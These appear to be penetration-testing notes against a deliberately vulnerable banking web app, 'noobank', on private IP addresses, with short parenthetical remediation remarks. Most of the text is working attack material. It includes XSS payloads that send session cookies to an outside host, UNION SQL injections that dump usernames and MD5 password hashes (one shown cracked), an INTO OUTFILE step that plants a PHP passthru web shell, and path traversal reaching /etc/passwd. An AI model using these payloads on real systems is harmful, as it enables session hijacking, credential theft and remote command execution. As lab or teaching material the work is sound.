
http://192.168.152.128/signin.php?

appver=2.3"><script>document.forms[0].action="http://192.168.1.103"</script><p

http://192.168.152.128/signin.php?
appver=2.3"><script>document.forms[0].action="http://192.168.1.103/cookie="%2Bdocum
ent.cookie%2B""</script><p

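(Both requests depend on the appver value being echoed into the sign-in page without escaping. HTML-encoding it on output closes the injection, and marking the session cookie HttpOnly keeps it out of reach of document.cookie.)

----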

<script> document.write("</tr> <tr> <td> 27 </td> <td> 4068444801665127 </td>


<td> 4916843735650523 </td> <td> 11.0000 </td> <td> RON </td> <td>") </script>

<script> document.write("<td>Plata utilitate apa</td> <tr><td> 19 </td> <td>


4068444801665127 </td> <td> 4916843735650523 </td> <td> 100.0000 </td> <td> RON
</td> <td>Charge Back</td> </tr>")</script>

<script>document.write("<img
src='http://192.168.1.106/cookie="+document.cookie+"' />");</script>
----

-- Every table visible to the connected account, paired with its schema.
-- The result is limited to objects that account has privileges on, so a
-- narrowly scoped application account shrinks what this can return.
SELECT
    table_schema,
    table_name
FROM information_schema.tables;

-- Schema names only; one row per table, so a schema name repeats.
SELECT
    table_schema
FROM information_schema.tables;

http://192.168.152.128/payment_history.php?account_no=44855' UNION select


1,2,3,table_schema,5,6,7 FROM information_schema.tables -- 80711356672

http://192.168.152.128/payment_history.php?account_no=44855' UNION select


1,2,3,table_name,5,6,7 FROM information_schema.tables -- 80711356672

http://192.168.152.128/payment_history.php?account_no=44855' UNION select


1,2,3,table_name,5,6,7 FROM information_schema.tables where table_schema =
'noobank' -- 80711356672

No Source Account Destination Account Amount Currency Details


1 2 3 accounts 5 6
2 2 3 transactions 5 6
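3 2 3 users 5 6

(The table names show up in the payment history output because account_no is evidently concatenated into the query text. Binding it as a parameter in a prepared statement, and validating it as a numeric account number, removes the injection.)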

http://192.168.152.128/payment_history.php?account_no=44855' UNION select


1,2,3,column_name,5,6,7 FROM information_schema.columns WHERE table_schema !=
'mysql' AND table_schema != 'information_schema' -- 80711356672
http://192.168.152.128/payment_history.php?account_no=44855' UNION select
1,2,my_user,my_pass,5,6,7 FROM users WHERE 1 -- 80711356672
admin 611cf29894980e7b402ce6b3302eaf9f

bonnie c2075acb16b3879f562f0784ec5f3675
clyde 483f049a90115fc538ab48eb463ddfb1

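http://www.md5online.org/ Admin149

(The 32-hex-digit values above look like unsalted MD5. A hash that resolves through a public lookup service is the reason to store passwords with a salted, slow algorithm such as bcrypt or Argon2.)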

-------

/var/www/html/noobank

<?phppassthru($_GET['cmd']); ?>

select '<?phppassthru($_GET['cmd']); ?>' into outfile


'/var/www/html/noobank/file.txt'

http://192.168.152.128/payment_history.php?account_no=44855' UNION select


1,2,3,'aaaaa',5,6,7 into outfile '/var/www/html/noobank/file.txt' -- 587588

<? phppassthru($_GET['cmd']); ?>

http://192.168.152.128/payment_history.php?account_no=44855' UNION select 1,2,3,"<?


php passthru($_GET['cmd']); ?>",5,6,7 into outfile '/var/www/html/noobank/out.php'
-- 587588

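(INTO OUTFILE needs the database account to hold the FILE privilege and secure_file_priv to permit the target directory. Revoking FILE from the application account, and keeping the web root unwritable by the database server's OS user, blocks this step even if the injection itself remains.)

-------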

http://192.168.152.128/payment_history.php?
account_no=4916843735650523&save=true&file=reports/4916843735650523-26.10.2016-
04:24:34.csv

http://192.168.152.128/payment_history.php?
account_no=4916843735650523&save=true&file=/etc/issue

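../../../../etc/passwd

(If the file parameter is opened as given, any path the web server user can read is exposed. The server should resolve the requested path and reject anything outside the reports directory, or better, look reports up by an identifier instead of accepting a path.)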
